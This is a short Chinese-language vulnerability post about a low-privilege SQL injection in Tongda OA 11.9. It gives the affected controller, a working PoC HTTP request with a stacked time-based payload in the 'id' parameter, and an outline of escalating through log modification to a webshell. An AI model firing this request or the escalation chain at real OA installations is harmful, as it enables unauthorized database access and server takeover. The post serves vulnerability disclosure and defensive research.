# 通达OA11.9 低权限SQL注入漏洞
利用条件:任意一个用户PHPSESSID 后台堆叠注入 -> 修改日志getshell
\general\appbuilder\modules\portal\controllers\WorkbenchController.php:
![](/static/lingjiao/images/16158605326396.jpg)
**PoC:**
“`
POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
Host:
…
uid=5&status=1&id=2;select sleep(3)
“`
ref:
catw0rld
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容